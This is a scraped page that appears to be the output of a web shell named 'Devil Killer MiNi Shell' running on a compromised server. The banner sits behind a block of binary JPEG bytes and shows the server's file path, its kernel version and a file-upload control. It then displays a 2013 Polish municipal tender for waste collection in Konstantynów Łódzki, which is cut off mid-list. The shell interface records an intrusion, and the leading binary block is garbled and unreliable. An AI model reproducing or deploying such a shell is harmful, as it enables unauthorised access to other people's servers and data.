JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130125/14167-N-2013.html

<p class="kh_header"><b>Konstantynów Łódzki: Zbiórka odpadów na terenie Gminy Konstantynów Łódzki w zakresie odpadów wielkogabarytowych i obsługi pojemników wchodzących w skład systemu selektywnej zbiórki odpadów - część 1 zamówienia</b><br>
<b>Numer ogłoszenia: 14167 - 2013; data zamieszczenia: 25.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Zgierska 2, 95-050 Konstantynów Łódzki, woj. łódzkie, tel. 042 2111173, faks 042 2111168.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.konstantynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zbiórka odpadów na terenie Gminy Konstantynów Łódzki w zakresie odpadów wielkogabarytowych i obsługi pojemników wchodzących w skład systemu selektywnej zbiórki odpadów - część 1 zamówienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Niniejsze postępowanie o udzielenie zamówienia publicznego jest prowadzone w trybie przetargu nieograniczonego i stanowi część 1 zamówienia udzielanego w częściach w trybie art. 6a ustawy PZP, z których każda stanowi przedmiot odrębnego postępowania, na podstawie przepisów ustawy z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych (dalej PZP) t. j. z 2010 r. Dz. U. Nr 113 poz. 759 ze zmianami. 
Przedmiotem zamówienia są zadania opisane w punktach 3.1. i 3.3. 
3.1. Zadanie obejmujące zakresem obsługę pojemników wchodzących w skład systemu selektywnej zbiórki odpadów w ogólnodostępnych punktach zlokalizowanych na terenie gminy Konstantynów Łódzki, w którego skład wchodzi:
a.  sieć punktów wyposażonych w pojemniki i worki do selektywnej zbiórki odpadów z opakowań szklanych 
b.  sieć punktów wyposażonych w pojemniki i worki do selektywnej zbiórki odpadów z opakowań typu PET 
c.  sieć punktów wyposażonych w pojemniki i worki do selektywnej zbiórki odpadów z papieru i tektury 
d.  punkty wyposażone w pojemniki do selektywnej zbiórki odpadów z baterii 
e.  punkt wyposażony w pojemnik do selektywnej zbiórki odpadów z jarzeniówek, świetlówek, żarówek 
f.  sieć aptek w Konstantynowie wyposażonych w pojemniki na przeterminowane leki 
3.2. Zakres czynności opisanych w punkcie 3.1. obejmuje:
a.  Wywóz szkła białego i kolorowego 
sieć punktów wyposażonych w pojemniki do selektywnej zbiórki odpadów z opakowań szklanych w ilości i miejscach wymienionych w załączniku nr 7 
b.  Wywóz butelek typu PET 
sieć punktów wyposażonych w pojemniki do selektywnej zbiórki odpadów z opakowań typu PET 
w ilości i miejscach wymienionych w załączniku nr 7 
c.  Wywóz makulatury 
sieć punktów wyposażonych w pojemniki do selektywnej zbiórki odpadów z papieru i tektury w ilości 
i miejscach wymienionych w załączniku nr 7 
d.  Wywóz baterii
sieć punktów wyposażonych w pojemniki do selektywnej zbiórki baterii w miejscach        wymienionych w załączniku nr 7 
e.  Wywóz jarzeniówek, świetlówek, żarówek
punkt wyposażony w pojemnik do selektywnej zbiórki jarzeniówek, świetlówek, żarówek w miejscu wymienionym w załączniku nr 7
f.  Wywóz przeterminowanych leków
pojemniki na przeterminowane leki w aptekach wymienionych w załączniku nr 7 
3.3. Zadanie obejmujące zakresem zbiórkę odpadów wielkogabarytowych z terenu gminy Konstantynów Łódzki, polegającej na obwoźnej zbiórce z ulic miasta odpadów wielkogabarytowych pochodzących z gospodarstw domowych.  
3.4. Zakres czynności wskazanych w punkcie 3.3. obejmuje:
Odbiór wg ustalonego haromonogramu w dniach: 12.03.2013 r., 13.03.2013 r., 14.03.2013 r., 15.03.2013 r. odpadów wielkogabarytowych. 
W niniejszym postępowaniu Zamawiający przewiduje składanie ofert częściowych.  
Każdy z Wykonawców może złożyć ofertę na wybrane części lub wszystkie części jak niżej:
Część 1 - w zakresie selektywnej zbiórki odpadów:    
Część 1a Wywóz szkła 
Część 1b Wywóz tworzyw sztucznych 
Część 1c Wywóz makulatury 
Część 1d Wywóz baterii
Część 1e Wywóz jarzeniówek, świetlówek, żarówek
Część 1f Wywóz przeterminowanych leków
Część 2 - w zakresie zbiórki odpadów wielkogabarytowych
Odbiór wg haromonogramu odpadów wielkogabarytowych określonego w załączniku nr 8 SIWZ 


Część 1a Wywóz szkła 
Część 1b Wywóz tworzyw sztucznych 
Część 1c Wywóz makulatury 
Część 1d Wywóz baterii
Część 1e Wywóz jarzeniówek, świetlówek, żarówek
Część 1f Wywóz przeterminowanych leków.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.31.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Opis sposobu dokonywania oceny spełniania warunku:
Wykonawca składający ofertę w częściach 1a, 1b, 1c, 1d, 1e, 1f jest zobowiązany do potwierdzenia uprawnień do odbioru i transportu odpadów. Warunek zostanie spełniony, jeżeli wykonawca posiada i przedstawi zezwolenie (decyzję) Organu, uprawniające do zbierania i transportu odpadów wydane na podstawie art. 28 ustawy z 27.04.2001 r. -O odpadach- Dz. U. Nr 62, poz.628.
Wykonawca składający ofertę w części 2 jest zobowiązany do potwierdzenia posiadania wpisu do rejestru działalności regulowanej w zakresie odbioru odpadów komunalnych, właściwe ze wzg. na miejsce odbioru odpadów z gminy Konstantynów Łódzki.
Ocena spełnienia przez Wykonawcę powyższych warunków będzie dokonywana metodą:spełnia-nie spełnia w oparciu o dokumenty, oświadczenia i informacje zawarte w ofercie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli: 
Wykonawca składający ofertę w części 1a, 1b, 1c, 1d, 1e, 1f wykaże, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, zrealizował lub realizuje co najmniej 2 (dwie) usługi w zakresie selektywnej zbiórki odpadów.  Warunek zostanie spełniony, jeżeli Wykonawca wykaże (załącznik nr 4 SIWZ) wykonanie najmniej 2 (dwu) usług w zakresie selektywnej zbiórki odpadów, potwierdzonych referencjami należytego wykonania usługi.  
Wykonawca składający ofertę w części 2 wykaże, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, zrealizował lub realizuje co najmniej 1(jedną) usługę w zakresie zbiórki komunalnych odpadów wielkogabarytowych. 
Warunek zostanie spełniony, jeżeli Wykonawca wykaże (załącznik nr 4 SIWZ) wykonanie najmniej 1(jednej) usługi w zakresie zbiórki komunalnych odpadów wielkogabarytowych.
Ocena spełnienia przez Wykonawcę powyższych warunków będzie dokonywana metodą:spełnia-nie spełnia w oparciu o dokumenty, oświadczenia i informacje zawarte w ofercie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Dokument, z którego wynika upoważnienie wykonawcy do podpisania oferty lub pełnomocnictwo do reprezentowania wykonawcy, jeżeli ofertę składa pełnomocnik;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zostały określone w projektach umów stanowiących załączniki SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.konstantynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejskie w Konstantynowie Łódzkim ul. Zgierska 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2013 godzina 11:30, miejsce: Oferty należy dostarczyć do siedziby Zamawiającego, kancelaria - parter Urzędu, pokój 06 lub przesłać na adres Zamawiającego: Gmina Konstantynów Łódzki, ul. Zgierska 2, 95-050 Konstantynów Łódzki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1a Wywóz szkła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres poszczególnych części obejmuje:
W części 1a WYWÓZ SZKŁA BIAŁEGO I KOLOROWEGO (pojemniki i worki do selektywnej zbiórki odpadów z opakowań szklanych)
a)odbiór pojemników i worków z punktów ich zbiórki (czynność ta obejmuje również załadunek na środki transportu). Wykaz punktów zbiórki odpadów zawiera załącznik nr 7,
b)   przewóz na trasie punkt zbiórki - wyspecjalizowany odbiorca (w tym rozładunek u odbiorcy),
c)   sprzątanie terenu z wszelkich odpadów tego samego rodzaju, które znajdują się w pobliżu pojemnika,
d)    naprawa szkód powstałych w trakcie wykonania czynności wymienionych w punktach a), b), c)
Czynności wymienione w częściach od 1a do 1f w zakresie punktów a), b), c) winny być wykonywane z częstotliwością wskazaną przez Zamawiającego, lecz nie rzadziej niż jeden raz w miesiącu, a czynności opisane w punkcie d) według potrzeb, lecz nie później niż 7 dni od daty powstania.
Składanie comiesięcznych sprawozdań do faktur zawierających ilość selektywnie zebranych odpadów z rozbiciem na poszczególne lokalizacje.
Wywóz szkła - 37 szt. pojemników typu dzwon o poj. 2,5 m3 z klapami uchylnymi mocowanymi po zewnętrznych stronach dna pojemnika oraz 3 szt. worków o pojemności 120 l = 0,12 m3 każdy. Przewidywana usługa nie może przekroczyć wywozu w ilości 40 szt. pojemników oraz 70 szt. worków do końca trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1b Wywóz tworzyw sztucznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W części 1b WYWÓZ TWORZYW SZTUCZNYCH -  BUTELEK TYPU PET (pojemniki i worki do selektywnej zbiórki odpadów z opakowań typu PET):
a)odbiór pojemników i worków z punktów ich zbiórki (czynność ta obejmuje również załadunek na środki transportu).Wykaz punktów zbiórki odpadów zawiera załącznik nr 7,          
Wykonawca zobowiązany jest do odbioru całej zawartości pojemnika.
b)przewóz na trasie punkt zbiórki - wyspecjalizowany odbiorca (w tym rozładunek u  odbiorcy),
c)sprzątanie terenu z wszelkich odpadów tego samego rodzaju, które znajdują się w pobliżu pojemnika,             
d)naprawa szkód powstałych w trakcie wykonania czynności wymienionych w punktach a), b), c)
Czynności wymienione w zakresie punktów a), b), c) winny być wykonywane z częstotliwością wskazaną przez Zamawiającego, lecz nie rzadziej niż jeden raz w miesiącu, a czynności opisane w punkcie d) według potrzeb, lecz nie później niż 7 dni od daty powstania szkody.Składanie comiesięcznych sprawozdań do faktur zawierających ilość selektywnie zebranych odpadów z rozbiciem na poszczególne lokalizacje.
Wywóz surowców selektywnie gromadzonych w zakresie tworzyw sztucznych będzie odbywał się z 22 szt. pojemników siatkowych o poj. 2,5 m3 z łamanym dnem oraz 3 szt. worków o pojemności 120 l = 0,12 m3 każdy. Przewidywana usługa nie może przekroczyć wywozu w ilości 220 szt. pojemników oraz 300 szt. worków do końca trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1c Wywóz makulatury.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W części 1c WYWÓZ MAKULATURY (pojemniki i worki do selektywnej zbiórki odpadów z papieru i tektury)
a) odbiór pojemników i worków z punktów ich zbiórki (czynność ta obejmuje również załadunek na środki transportu). Wykaz punktów zbiórki odpadów zawiera załącznik nr 7,
b) przewóz na trasie punkt zbiórki - wyspecjalizowany odbiorca (w tym rozładunek u odbiorcy),
c) sprzątanie terenu z wszelkich odpadów tego samego rodzaju, które znajdują się w pobliżu pojemnika,
d) naprawa szkód powstałych w trakcie wykonania czynności wymienionych w punktach a), b), c) Czynności wymienione w zakresie punktów a), b), c) winny być wykonywane z częstotliwością wskazaną przez Zamawiającego, lecz nie rzadziej niż jeden raz w miesiącu, a czynności opisane w punkcie d) według potrzeb, lecz nie później niż 7 dni od daty powstania.
Wwóz makulatury będzie sie odbywał z 14 szt. pojemników typu dzwon o poj.2,5 m3 z klapami uchylnymi mocowanymi po zewnętrznych stronach dna pojemnika oraz 3 szt. worków o pojemności 120 l = 0,12 m3 każdy. Przewidywana usługa nie może przekroczyć wywozu w ilości 84 szt. pojemników oraz 130 szt. worków do końca trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1d Wywóz baterii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W części 1d WYWÓZ BATERII (pojemniki do selektywnej zbiórki baterii)
a)odbiór pojemników z punktów ich zbiórki (czynność ta obejmuje również załadunek na środki transportu). Wykaz punktów zbiórki odpadów zawiera załącznik nr 7, 
b) przewóz na trasie punkt zbiórki - wyspecjalizowany odbiorca (w tym rozładunek u odbiorcy),
c) sprzątanie terenu z wszelkich odpadów tego samego rodzaju, które znajdują się w pobliżu pojemnika,     
d) naprawa szkód powstałych w trakcie wykonania czynności wymienionych w punktach a), b), c)
Czynności wymienione w częściach od 1a do 1f w zakresie punktów a), b), c) winny być wykonywane z częstotliwością wskazaną przez Zamawiającego, lecz nie rzadziej niż jeden raz w miesiącu, a czynności opisane w punkcie d) według potrzeb, lecz nie później niż 7 dni od daty powstania. Składanie comiesięcznych sprawozdań do faktur zawierających ilość selektywnie zebranych odpadów z rozbiciem na poszczególne lokalizacje.
Wywóz surowców selektywnie gromadzonych, baterii będzie odbywał się z  5 szt. pojemników poj. 20 l (ok.30 kg), typ KCA box wykonanego z polietynenu o wym. 280x240x460. Przewidywana usługa nie może przekroczyć wywozu w ilości 150 kg. surowca do końca trwania umowy (wartość przybliżona)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1e Wywóz jarzeniówek, świetlówek, żarówek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W części 1e WYWÓZ JARZENIÓWEK, ŚWIETLÓWEK, ŻARÓWEK (pojemniki do selektywnej zbiórki jarzeniówek, świetlówek, żarówek)
a )  odbiór pojemników z punktów ich zbiórki (czynność ta obejmuje również załadunek na środki transportu). Wykaz punktów zbiórki odpadów zawiera załącznik nr 7,
b)   przewóz na trasie punkt zbiórki - wyspecjalizowany odbiorca (w tym rozładunek u odbiorcy),
c)   sprzątanie terenu z wszelkich odpadów tego samego rodzaju, które znajdują się w pobliżu  pojemnika,
